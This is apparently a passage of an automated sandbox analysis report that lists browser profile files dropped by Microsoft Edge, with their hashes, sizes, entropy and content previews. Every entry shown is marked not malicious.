Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375590443683056","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375590443683056","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF28850.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	37149
Entropy (8bit):	5.564737347223386
Encrypted:	false
SSDEEP:	768:5ZGaxaWPnvfS38F1+UoAYDCx9Tuqh0VfUC9xbog/OV12tWiEirwUg2bqKpktuZ:5ZGaxaWPnvfS3u1jas2tXEHUg2+ZtK
MD5:	18F1B7FC6ECD564EFA5AC69C12A83A86
SHA1:	A6B877D1A7E47FFD130DCC13D78F89F96896CBA7
SHA-256:	3B64268FA832215AABCD16571D42279C198C2C9D43C4C7C9014FBC7BC21E1D9B
SHA-512:	343CF70AACEF770AC2157537448A5D6BE820BBD76A1E6C763F9F1E73380C7665E37DE8214BA0FBCF126C66459B4527092B5C2E3FCBB16924F2BC4F3756689766
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375590443683056","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375590443683056","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.842187701913969
Encrypted:	false
SSDEEP:	24:F2xc5NmQcncmo0CRORpllg2DtSfRHCsVdCRORpllg2njZd7KCRORpllg2DttRHCf:F2emhtrdDgfBBXrdjZdyrdDLBOrd4BQ
MD5:	FA2785470599049AEE6971F8A8B842E9
SHA1:	88AEEB6E2FD274B4CC60BAB03B55CED7BA5E05D9
SHA-256:	8A4E4CAB793C5CCF746A8EAB56A565F47F39C8DD77F6737E4999C0E35342FEB1
SHA-512:	7E32F5050E6480D40910CBEFBE546460E0DEE3A381C36960F29612F88CF83A12AAEE760D68AFEA89BBF127EDB2545BD7818023B9DB4DD1C695253C7EC749756D
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2/.Im................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8........@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	305
Entropy (8bit):	5.193734548603358
Encrypted:	false
SSDEEP:	6:HiTIHM1cNwi23oH+TcwtE/a252KLlViJNOq2PcNwi23oH+TcwtE/a2ZIFUv:CTIH2ZYeb8xLqjOvLZYeb8J2FUv
MD5:	A23DA9DE153B1B6626965633589EFCCD
SHA1:	112D587E5DA5EC22F24454080E130230C868C932
SHA-256:	8876AB6B16DEB16219571BB5A014418E25DCEF2FEFCE2DBBF1AD0E8D142DE2F9
SHA-512:	14AFE963AE2FB1F6DD67D42C0717693245BA65B46B90E12D924521F5A63AC3CAB3D0E6C4660DB168D058175E84182BAEB05DCFB6093F33D09A398C5A439B60B3
Malicious:	false
Preview:	2024/11/08-20:47:33.789 1264 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/08-20:47:33.804 1264 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	113649
Entropy (8bit):	5.578750650939915
Encrypted:	false
SSDEEP:	1536:sa906yxPXfOrr1lhCe1+46rCjF3NlH2cgOz/0iL/rDL/rQRZ:f9LyxPXfOrr1lMe1z6rWXl8iL/HL/u
MD5:	7B7100929CC7EEFD33061B6B097226D8
SHA1:	D5A795BD9C0865255E7966A6CB9AA566C18F5010
SHA-256:	6C5059ABB580C34E36EAB9BACE4646F54E317CEE0CCBC7D4853FCC1F82D38098
SHA-512:	300E557FC2BF04858EB8F75D516FDB2E706AAE1982AB15474968453C3B30748EB6FC380064A5941E5D403B7800702B971E9842D94116BBEBB2E863D537D47C08
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	187825
Entropy (8bit):	6.380449042811657
Encrypted:	false
SSDEEP:	3072:W+JbKhNElgSQwr7WAS/krBfo2WnLHJfp/PlTdL/7b3RoC4v9:jQwskrybbJh/zL//14v9
MD5:	709B864C7BC3B177EAD86A8F896B93C1
SHA1:	3A27F90A9990EB40B9BDAB3A3B74A0AA0C533450
SHA-256:	7C9B3F9194473DC04081C2ACDB9DD0ABEE351436FF14B82A233912D2032706DA
SHA-512:	69610AC0436382BA24D953EB64F03CF36E6277AAEF8808D916AFF441341434B87B2C66B030A3EB881DBE69C3F0C6600ABB03C35F0F46C82214575940174C8948
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;....x.X........,T.8..`,.....L`.....,T...`......L`......Rc&..U....exports...Rc........module....Rc:oT7....define....RbzB......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.nu..b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....S...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5376346459829513
Encrypted:	false
SSDEEP:	3:ySXTXl/lrV/lxEwltztl:ySz6QR
MD5:	74CFD257E07F1C2A9CFEF196E4FB29EA
SHA1:	4D4EF41B25E0FF25B9E709D3CC05AE4EE73085CD
SHA-256:	418148ED6C68C1C671AFB8AD0064E49F29E21EB7C32F4872B33683B6CCA37B17
SHA-512:	2771924F2FBAF587A5029F2F7A7A7418BE99D072B2998809C25038FF158F46C8965F22FD3853268727A02EB3229806833DB884FB28932735740D13A0E41921BC
Malicious:	false
Preview:	@...GJ..oy retne.........................X....,................:...../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5376346459829513
Encrypted:	false
SSDEEP:	3:ySXTXl/lrV/lxEwltztl:ySz6QR
MD5:	74CFD257E07F1C2A9CFEF196E4FB29EA
SHA1:	4D4EF41B25E0FF25B9E709D3CC05AE4EE73085CD
SHA-256:	418148ED6C68C1C671AFB8AD0064E49F29E21EB7C32F4872B33683B6CCA37B17
SHA-512:	2771924F2FBAF587A5029F2F7A7A7418BE99D072B2998809C25038FF158F46C8965F22FD3853268727A02EB3229806833DB884FB28932735740D13A0E41921BC
Malicious:	false
Preview:	@...GJ..oy retne.........................X....,................:...../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF2abe6.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5376346459829513
Encrypted:	false
SSDEEP:	3:ySXTXl/lrV/lxEwltztl:ySz6QR
MD5:	74CFD257E07F1C2A9CFEF196E4FB29EA
SHA1:	4D4EF41B25E0FF25B9E709D3CC05AE4EE73085CD
SHA-256:	418148ED6C68C1C671AFB8AD0064E49F29E21EB7C32F4872B33683B6CCA37B17
SHA-512:	2771924F2FBAF587A5029F2F7A7A7418BE99D072B2998809C25038FF158F46C8965F22FD3853268727A02EB3229806833DB884FB28932735740D13A0E41921BC
Malicious:	false
Preview:	@...GJ..oy retne.........................X....,................:...../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	5123
Entropy (8bit):	3.4479826234557045
Encrypted:	false
SSDEEP:	96:pJKqnVGllmlOigyE9Xp+wP+jid7u5bjLl9iSr/1I+zDk0:LcmZ69Xp+eEidq5bjLl9iSr/d
MD5:	873889C83CD21E185CE5A631450B34ED
SHA1:	1B8775851A419B952D9C39A899CCDF81097786BC
SHA-256:	095C2697C8B53636F2E5D16CA781B41A3C7AD6ADE58E5AF89340BF59A2485C68
SHA-512:	C3A084261248749D694747ABFAA62F074E7F67A1706498D49853C811FEB8F3BC995081944EA740AB8BEB85EAEEFA11B65DAD6EDAF8355EB94DB8DF9CD0C70AB5
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................u_b................next-map-id.1.Cnamespace-ff8b916e_69d9_482b_9f5c_c804d1a61496-https://ntp.msn.com/.0.....................map-0-shd_sweeper.%{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.h.p.s.b.t.q.l.t.,.p.r.g.-.a.d.-.c.-.s.t.a.b.-.b.n.,.p.r.g.-.c.-.s.t.a.b.-.b.n.,.p.r.g.-.s.p.-.l.a.y.o.u.t.,.i.c.r.s.c.a.l.l.-.s.p.o.r.t.s.,.p.r.g.-.1.s.w.-.s.a.e.d.g.e._.q.r.1.t.3.,.p.r.g.-.1.s.w.-.s.a.-.i.m.g.e.m.b.e.d.d.i.n.g.v.3.c.t.r.l.,.p.r.g.-.1.s.w.-.t.r.d.i.s.c.c.2.,.1.s.-.n.t.f.1.-.r.d.i.d.n.,.1.s.-.n.t.f.1.-.f.s.p.t.b.r.c.,.1.s.-.n.t.f.1.-.p.n.o.t.s.,.p.r.g.-.1.s.w.-.m.o.n.e.x.p.b.,.p.r.g.-.1.s.w.-.p.n.o.t.i.a.,.p.r.g.-.p.1.-.t.s.4.c.o.l.d.,.1.s.w.-.t.p.s.n.-.d.s.t.p.r.g.1.d.c.y.7.-.t.,.1.s.-.t.p.s.n.-.d.s.t.d.c.y.7.,.1.s.-.t.p.s.n.p.1.-.d.t.d.c.,.p.r.g.-.1.s.w.-.c.-.r.i.v.c.o.v.r.d.h.i.g.h.,.2.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.167213683176881
Encrypted:	false
SSDEEP:	6:HtW+q2PcNwi23oH+TcwtrQMxIFUt8Ytvw5Zmw+Yt7jVkwOcNwi23oH+TcwtrQMFd:NXvLZYebCFUt8Evw5/+E7p54ZYebtJ
MD5:	1215CA6BF8729615427CCFAA54378972
SHA1:	E08A60A9FEB66D7CB4B57A27DA992CAEAC654641
SHA-256:	7DB27D5CBEEC3351BAEE0694766C67E5ED46DFF188EA26A4A9F9BE2362E45623
SHA-512:	1C26D0BB7703B30628F4C2014B075260D01099927129EEC0063AFD4E8F833F3933A8E5D58D512AB8CDD59775D3E4CB9D441611504EF6320978C0875ED4A8824E
Malicious:	false
Preview:	2024/11/08-20:47:24.346 1dc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/08-20:47:24.348 1dc8 Recovering log #3.2024/11/08-20:47:24.352 1dc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.167213683176881
Encrypted:	false
SSDEEP:	6:HtW+q2PcNwi23oH+TcwtrQMxIFUt8Ytvw5Zmw+Yt7jVkwOcNwi23oH+TcwtrQMFd:NXvLZYebCFUt8Evw5/+E7p54ZYebtJ
MD5:	1215CA6BF8729615427CCFAA54378972
SHA1:	E08A60A9FEB66D7CB4B57A27DA992CAEAC654641
SHA-256:	7DB27D5CBEEC3351BAEE0694766C67E5ED46DFF188EA26A4A9F9BE2362E45623
SHA-512:	1C26D0BB7703B30628F4C2014B075260D01099927129EEC0063AFD4E8F833F3933A8E5D58D512AB8CDD59775D3E4CB9D441611504EF6320978C0875ED4A8824E
Malicious:	false
Preview:	2024/11/08-20:47:24.346 1dc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/08-20:47:24.348 1dc8 Recovering log #3.2024/11/08-20:47:24.352 1dc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13375590446238943

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.7963526140232875
Encrypted:	false
SSDEEP:	24:3KFz5BWGpsAF4unxytLp3X2amEtG1ChqakbAvcQKkOAM4e:3AlB9zFULp2FEkChBoitHOp
MD5:	8CD42F355256EC53510B4214039A6EE5
SHA1:	D8F6CFB303E0A6E9A7E503E3C63AD75E2CE75291
SHA-256:	D307639D72E43C9173DE0E96ADCB0BD3025E3B14E285E98C3D0102433E2A2B6D
SHA-512:	F9F4007F15AD5A130CFCBF9F06B1AF0048BFC82B247DB31E45668A56267CE37138595A8DD4F0471E6E41EBAA89A61CF3A34F9130D59D90E798A43F5F24768DBA
Malicious:	false
Preview:	SNSS......../1'............/1'......"./1'............/1'......../1'......../1'......../1'....!.../1'................................/1'./1'1..,..../1'$...ff8b916e_69d9_482b_9f5c_c804d1a61496..../1'......../1'................/1'..../1'......................../1'....................5..0..../1'&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}....../1'......../1'.........................../1'............/1'........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........q&....q&.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.138949838992746
Encrypted:	false
SSDEEP:	6:HwlTjq2PcNwi23oH+Tcwt7Uh2ghZIFUt8YwlHZZmw+YwlHzkwOcNwi23oH+Tcwts:23vLZYebIhHh2FUt8VHZ/+VHz54ZYebs
MD5:	6439C8EC8ADC46C496B6663037DBEB7D
SHA1:	AECB06F292DB05C3D137A9C25AA8B10357C352AC
SHA-256:	514C1F27F4C0EC4E7972BC168594B20332DBFFC6E038D8F0D0F18D97BFDDBCD8
SHA-512:	20B3BFBCA8FD340421B801A24E2175345710444EC24682697EC3F174FBC7ED484AB8ECF0B2B796A003C49028BE37982ACD0AC69E033AD74152340C7DAFAECA44
Malicious:	false
Preview:	2024/11/08-20:47:23.736 17e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/08-20:47:23.737 17e0 Recovering log #3.2024/11/08-20:47:23.737 17e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.138949838992746
Encrypted:	false
SSDEEP:	6:HwlTjq2PcNwi23oH+Tcwt7Uh2ghZIFUt8YwlHZZmw+YwlHzkwOcNwi23oH+Tcwts:23vLZYebIhHh2FUt8VHZ/+VHz54ZYebs
MD5:	6439C8EC8ADC46C496B6663037DBEB7D
SHA1:	AECB06F292DB05C3D137A9C25AA8B10357C352AC
SHA-256:	514C1F27F4C0EC4E7972BC168594B20332DBFFC6E038D8F0D0F18D97BFDDBCD8
SHA-512:	20B3BFBCA8FD340421B801A24E2175345710444EC24682697EC3F174FBC7ED484AB8ECF0B2B796A003C49028BE37982ACD0AC69E033AD74152340C7DAFAECA44
Malicious:	false
Preview:	2024/11/08-20:47:23.736 17e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/08-20:47:23.737 17e0 Recovering log #3.2024/11/08-20:47:23.737 17e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018164538716206493
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEZl8nt:/M/xT02zf
MD5:	0600A9E5F31F67899A4A6923F6EFA569
SHA1:	59D9AB4D8DB2EC946E912078F40380ACDFFF5056
SHA-256:	E4856B3174F611DF6064CBC65BB31143A2EF155D40974B474E314C6DFB9D6428
SHA-512:	5A0EAA2A95A42A6CD84E2769467C33651021132B71EF50DC2376FDD013C7298FA38D88AB9A2DA5C6AE7F502E3F919FBB1DFEC0573099DC281AECF0F8D52D579E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.2482018913743
Encrypted:	false
SSDEEP:	12:N7vLZYebvqBQFUt8Ei1/+E8bT54ZYebvqBvJ:NblYebvZg8ESWFoYebvk
MD5:	359626C832238B41F6A728294A95FACE
SHA1:	B19CD82AC49869BABF97BE2FFBD39CF03B1BA2C1
SHA-256:	D0C562838ECF35E1E844F796D9E37E0D382FE25903CD255E480FAF46E4C2E3E8
